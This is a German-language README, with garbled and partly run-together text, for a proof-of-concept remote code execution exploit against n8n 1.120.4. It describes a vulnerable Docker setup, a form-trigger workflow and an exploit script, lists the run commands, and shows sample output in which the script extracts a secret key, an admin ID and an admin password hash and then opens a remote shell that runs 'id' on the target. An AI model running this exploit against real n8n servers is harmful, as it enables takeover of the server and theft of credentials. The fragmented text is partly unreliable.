
Ni8mare, n8n RCE
PoC-Umgebung für n8n 1.120.4 mit einem Form-Trigger-Workflow und einem Exploit-Skript.
Dockerfile — erstellt die verwundbare n8n-Umgebungrun.bat — startet den Container (Windows)workflow.txt — n8n-Workflow (enthält Form Trigger)poc.py — PoC-Skriptrequirements.txt — PoC-Abhängigkeitendocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txt einpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, Admin-IDs) aus dem Ziel.n8n-shell>) wird bereitgestellt.id) gibt die Ausgabe aus der Zielumgebung zurück (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
Wir veröffentlichen einmal im Monat CVE- und Malware-Analysen. Wenn Sie interessiert sind, folgen Sie bitte den Links unten, um sich unsere Veröffentlichungen anzusehen.